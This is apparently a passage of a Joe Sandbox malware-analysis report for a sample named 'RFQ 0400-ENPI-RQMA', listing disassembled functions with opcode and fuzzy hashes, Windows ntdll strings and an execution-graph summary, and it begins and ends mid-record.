                                                                                      • Instruction Fuzzy Hash: E3900232251C0143D20075684C14B07100597E1343F55C116A0154555CCB2589615621
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402F90 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89e5220aa160ae6b4d9c0157ad6add4938b45b3cbffeb8094095ac6ca5125988
                                                                                      • Instruction ID: a8898b9220d4edcb65570764e9ac4021b76a17aabaeeff109c43ea48e5babb98
                                                                                      • Opcode Fuzzy Hash: 89e5220aa160ae6b4d9c0157ad6add4938b45b3cbffeb8094095ac6ca5125988
                                                                                      • Instruction Fuzzy Hash: 7B90023224180503D1007158481470B100597E1342F55C012A1164556DC73589516671
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402FA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41b29f71554afcc92a0960ff099880efb48fb5860e334b44e07ee0d44c518c95
                                                                                      • Instruction ID: a3ef55af68a590522ff01f405807bc6e679d7601d99f9022c52acf99cb6f82aa
                                                                                      • Opcode Fuzzy Hash: 41b29f71554afcc92a0960ff099880efb48fb5860e334b44e07ee0d44c518c95
                                                                                      • Instruction Fuzzy Hash: 5D90023224180503D10071584808747100597E1342F55C012A5164556EC775C9916631
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402FB0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 142646a65cf33eecc66ad1fe70eb5d4a00f752e64a58debd488a5c66a1b131d2
                                                                                      • Instruction ID: d0627a55c2a1ed14816c9013f78afcc9e8cd49860bd7e204ae91c987ac04387c
                                                                                      • Opcode Fuzzy Hash: 142646a65cf33eecc66ad1fe70eb5d4a00f752e64a58debd488a5c66a1b131d2
                                                                                      • Instruction Fuzzy Hash: 38900232641401434140716888449065005BBF2251755C122A0998551DC76989655765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402E30 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 432c251dca223beca49b84dcea0875026470d0d2eff718ca47c2bfaf7888b4d4
                                                                                      • Instruction ID: db8742fb5a9cb490437fae94822f60162f56f88bba5ccaccababdb32929d40c9
                                                                                      • Opcode Fuzzy Hash: 432c251dca223beca49b84dcea0875026470d0d2eff718ca47c2bfaf7888b4d4
                                                                                      • Instruction Fuzzy Hash: B590023234140503D102715844146061009D7E2385F95C013E1424556DC7358A53A232
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402EE0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38658d12516c0b91b4597eb12721449b1ec65b894fad9d11d366e022f025b761
                                                                                      • Instruction ID: d1f3d2046c65af61deacc458fc123a06cc875ca95e1a2d2deeaa5b530dcf3d0b
                                                                                      • Opcode Fuzzy Hash: 38658d12516c0b91b4597eb12721449b1ec65b894fad9d11d366e022f025b761
                                                                                      • Instruction Fuzzy Hash: F190027224180503D14075584804607100597E1342F55C012A2064556ECB398D516235
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402E80 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c935dda799e67c600df2f65fb437478ff18bbb6c5c579e5d0fd07ac378048f1
                                                                                      • Instruction ID: 8da44453a9cf573201e431319c8b3505ab468dc156c7ef5ab021d2475de1c07a
                                                                                      • Opcode Fuzzy Hash: 3c935dda799e67c600df2f65fb437478ff18bbb6c5c579e5d0fd07ac378048f1
                                                                                      • Instruction Fuzzy Hash: CD90023264140603D10171584404616100A97E1281F95C023A1024556ECB358A92A231
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402EA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7714217a5b27df9225f6a143fd713d73eb7f06dbb91145be1387d5d512abffde
                                                                                      • Instruction ID: 1a7529b713ad4fa060e3ccf76ecd51942c4f65903fcc47ca45d2abf67ae34fdd
                                                                                      • Opcode Fuzzy Hash: 7714217a5b27df9225f6a143fd713d73eb7f06dbb91145be1387d5d512abffde
                                                                                      • Instruction Fuzzy Hash: 9B90027224140503D14071584404746100597E1341F55C012A5064555EC7698ED56765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: 7e435593331c31e2487d12b4edeaabfe68a0aecdc95483d328937bc1cd29685c
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                                                      • Instruction ID: a6cc80d9846b394ae7afeb41e85ad65c9ce7c92426e7ffe14f82b43fa3666535
                                                                                      • Opcode Fuzzy Hash: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                                                      • Instruction Fuzzy Hash: F351D6B6A00116AFCB12DBAE888497FFBB8BB58240714827BF595D77D1D374DE4087A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014346FC
                                                                                      • Execute=1, xrefs: 01434713
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01434742
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01434655
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01434725
                                                                                      • ExecuteOptions, xrefs: 014346A0
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01434787
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 998db7534a9ab5c95a7be3bdcfbba081f605bfeba3ae2c43fa1aca71aa553646
                                                                                      • Instruction ID: 0452f467690784adda0763b38d85cd7a7fb037e1fd3373d909a9f550bf0f900d
                                                                                      • Opcode Fuzzy Hash: 998db7534a9ab5c95a7be3bdcfbba081f605bfeba3ae2c43fa1aca71aa553646
                                                                                      • Instruction Fuzzy Hash: AC51FB316002197BEF21ABA9DC85FFE77A8EF68318F1400AED705A72E1D7719A458F50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0140B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction ID: bf3a9544959f8e46695f379e45b07e42938a691d98b4a78b1f7fa165ded2c53e
                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction Fuzzy Hash: B681C238E012498EEF2B8E6EC8507BE7BB1EF95310F18453BD851A73F1C63489418B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01437B7F
                                                                                      • RTL: Resource at %p, xrefs: 01437B8E
                                                                                      • RTL: Re-Waiting, xrefs: 01437BAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
                                                                                      • Instruction ID: fbaa162d920293532e7ef6232d947aff867dc63902536ff5206c91e6af927d59
                                                                                      • Opcode Fuzzy Hash: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
                                                                                      • Instruction Fuzzy Hash: CE4103717007028FD725CE29CC40B6BB7E5EF98715F100A2EEA9A9B790DB31E4098B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0143728C
                                                                                      Strings
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01437294
                                                                                      • RTL: Resource at %p, xrefs: 014372A3
                                                                                      • RTL: Re-Waiting, xrefs: 014372C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
                                                                                      • Instruction ID: 604d8b4dc88ea2e04835f84dd9f4ee08044e965b61c8c802c1ffa3793888e98a
                                                                                      • Opcode Fuzzy Hash: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
                                                                                      • Instruction Fuzzy Hash: 304105B1700206ABD711CF29CC41F66B7A5FB98715F10061EFA95AB790DB31E8468BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: aeedf965bfa74229ea473a4f71cae366d193c0645b771589983cbcd5cb05b547
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: F291C470E002069ADB26DF6FC8906BFBBA5AF44322F14453FE995A73E0D730AD418752
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
                                                                                      • Instruction ID: f7c1838f3a699836aeeeb315a002529005520859321a142c3b2ff635a95d96d3
                                                                                      • Opcode Fuzzy Hash: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
                                                                                      • Instruction Fuzzy Hash: E1811B72D002699BDB35CB54CC45BEABBB8AB48714F0141EAEA19B7290D7705E85CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:23
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 80718 31d2ad0 LdrInitializeThunk 80721 3246a30 80723 3246a69 80721->80723 80722 3246a6d 80745 31d4c30 12 API calls __startOneArgErrorHandling 80722->80745 80723->80722 80724 3246a9a 80723->80724 80739 31d4650 LdrInitializeThunk 80723->80739 80724->80722 80740 31d39b0 LdrInitializeThunk 80724->80740 80728 3246be8 80729 3246ab9 80730 3246ac3 80729->80730 80731 3246ade 80729->80731 80730->80722 80742 31d2fb0 LdrInitializeThunk 80730->80742 80733 3246b3a __vswprintf 80731->80733 80734 3246b1f 80731->80734 80737 3246bcb 80733->80737 80741 31d4340 LdrInitializeThunk 80733->80741 80734->80722 80743 31d2fb0 LdrInitializeThunk 80734->80743 80737->80722 80744 31d2fb0 LdrInitializeThunk 80737->80744 80739->80724 80740->80729 80741->80737 80742->80722 80743->80722 80744->80722 80745->80728 80748 31d2c00 80750 31d2c0a 80748->80750 80751 31d2c1f LdrInitializeThunk 80750->80751 80752 31d2c11 80750->80752

                                                                                      Executed Functions

                                                                                      Function 031D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                                      • Instruction ID: d6a00159de13e3c5da6c5974ccf79255e443c656af57428682e895e2da413453
                                                                                      • Opcode Fuzzy Hash: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                                      • Instruction Fuzzy Hash: 6D900431705C0413D144F15C4DC45474005D7F4701F55D011F0435554CCF15CF575371
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                                      • Instruction ID: 0c480668f04ac46e948b79e2841c17db9c45c9915bb762d709a74cd9af379c8f
                                                                                      • Opcode Fuzzy Hash: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                                      • Instruction Fuzzy Hash: 2B900471701D04434144F15C4D044077005D7F57013D5D115F0555570CC71DCD55D37D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 6 31d2b60-31d2b6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                                      • Instruction ID: 2b7920d0418d3bf954549324a161d02124e909a1b5d6c921bd4ee7f43d055fd0
                                                                                      • Opcode Fuzzy Hash: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                                      • Instruction Fuzzy Hash: C6900261202804034109B1584514616400A87E4601B55D021E1015590DC72689916125
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 7 31d2ba0-31d2bac LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                                      • Instruction ID: 322650276d8a8504e30df95ccd9974720aaca6611f4a52a0181ac4a3a0c5ef76
                                                                                      • Opcode Fuzzy Hash: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                                      • Instruction Fuzzy Hash: 5690023160580C03D154B1584514746000587D4701F55D011A0025654D87568B5576A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 9 31d2bf0-31d2bfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                                      • Instruction ID: ff3153612c95c9bf7418793e8359072ccd65556e1483a6aa838921a4b5bac87d
                                                                                      • Opcode Fuzzy Hash: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                                      • Instruction Fuzzy Hash: AA90023120180C03D184B158450464A000587D5701F95D015A0026654DCB168B5977A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 8 31d2be0-31d2bec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                                      • Instruction ID: bdec1e244da58b3a3625e439212c3c975b356dd66d414e746c8ab3fb8236b27f
                                                                                      • Opcode Fuzzy Hash: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                                      • Instruction Fuzzy Hash: 8390023120584C43D144B1584504A46001587D4705F55D011A0065694D97268E55B661
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4 31d2ad0-31d2adc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
